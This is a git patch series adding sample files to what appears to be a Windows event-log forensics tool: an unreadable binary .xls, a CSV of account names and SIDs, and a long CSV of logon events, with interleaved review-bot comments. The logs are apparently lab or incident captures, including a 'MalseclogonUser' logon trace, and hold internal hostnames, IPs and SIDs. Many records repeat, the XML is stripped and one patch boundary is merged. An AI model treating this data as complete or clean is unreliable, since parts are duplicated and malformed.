From 3d16d1ba905d1283d27faaf43a2f8358e3e934d1 Mon Sep 17 00:00:00 2001
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:39:31 +0800
Subject: [PATCH 01/13] ADD file via upload
---
source/samples/EventID_Frequency_Analysis.xls | Bin 0 -> 10599 bytes
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 source/samples/EventID_Frequency_Analysis.xls
diff --git a/source/samples/EventID_Frequency_Analysis.xls b/source/samples/EventID_Frequency_Analysis.xls new file mode 100644 index 0000000000000000000000000000000000000000..881d74b9258d63e6d149990fcf5d035cecca4fdc GIT binary patch literal 10599 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 Date: Wed, 16 Oct 2024 23:39:45 +0800 Subject: [PATCH 02/13] ADD file via upload --- source/samples/Sample_Collected-SIDS.csv | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 source/samples/Sample_Collected-SIDS.csv diff --git a/source/samples/Sample_Collected-SIDS.csv b/source/samples/Sample_Collected-SIDS.csv new file mode 100644 index 0000000..4428ecd --- /dev/null +++ b/source/samples/Sample_Collected-SIDS.csv 
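Review bot: source/samples/EventID_Frequency_Analysis.xls is added as an opaque 10599-byte binary literal, so nothing in this patch lets a reviewer see what the workbook contains, and the legacy .xls container can carry macros as well as data. The other samples in this series are plain CSV; committing this one as CSV too would make its content diffable and remove the need to open an unreviewed workbook. If the .xls has to stay, replace the subject `ADD file via upload` with a message that names the tool run that produced the file.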
@@ -0,0 +1,19 @@
+User,SID
+01566S-WIN16-IR$,S-1-5-18
+ANONYMOUS LOGON,S-1-5-7
+IEUser,S-1-5-21-3461203602-4096304019-2269080069-1000
+Administrator,S-1-5-21-308926384-506822093-3341789130-500
+samir,S-1-5-21-308926384-506822093-3341789130-220106
+02694W-WIN10$,S-1-5-21-308926384-506822093-3341789130-84104
+Administrator,S-1-5-21-81107902-1099128984-1836738286-500
+EXCHANGE$,S-1-5-21-2895268558-4179327395-2773671012-1108
+IEUser,S-1-5-21-3583694148-1414552638-2922671848-1000
+lgrove,S-1-5-21-308926384-506822093-3341789130-101606
+a-jbrown,S-1-5-21-308926384-506822093-3341789130-1106
+user01,S-1-5-21-1587066498-1489273250-1035260531-1106
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+sshd_server,S-1-5-21-3583694148-1414552638-2922671848-1002
+LOCAL SERVICE,S-1-5-19
+NETWORK SERVICE,S-1-5-20
+admin01,S-1-5-21-1587066498-1489273250-1035260531-1108
--
2.34.1
From f87873afda0fc8f8a6644b072505a2d0d19771f7 Mon Sep 17 00:00:00 2001
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:39:58 +0800
Subject: [PATCH 03/13] ADD file via upload
---
source/samples/Sample_Logon_Events.csv | 13814 +++++++++++++++++++++++
1 file changed, 13814 insertions(+)
create mode 100644 source/samples/Sample_Logon_Events.csv
diff --git a/source/samples/Sample_Logon_Events.csv b/source/samples/Sample_Logon_Events.csv
new file mode 100644
index 0000000..b0b9d60
--- /dev/null
+++ b/source/samples/Sample_Logon_Events.csv
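Review bot: In source/samples/Sample_Collected-SIDS.csv the row `Administrator,S-1-5-21-1587066498-1489273250-1035260531-500` is added twice on consecutive lines, which suggests whatever produced this sample does not de-duplicate; drop one copy here and, if the file is tool output, de-duplicate at the source. `Administrator` and `IEUser` each map to more than one domain SID, so with only the `User,SID` columns a consumer that keys on the name will merge distinct accounts; a column naming the domain or host would disambiguate them. The file pairs account names with domain SIDs, so the commit message should state that they come from a lab capture rather than a production directory.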
@@ -0,0 +1,13814 @@ +Date and Time,timestamp,Event ID,Account Name,Account Domain,Logon Type,Logon Process,Source IP,Workstation Name,Computer Name,Channel,Original Event Log +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 
01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 
00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + 
IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" 
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 
+ 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 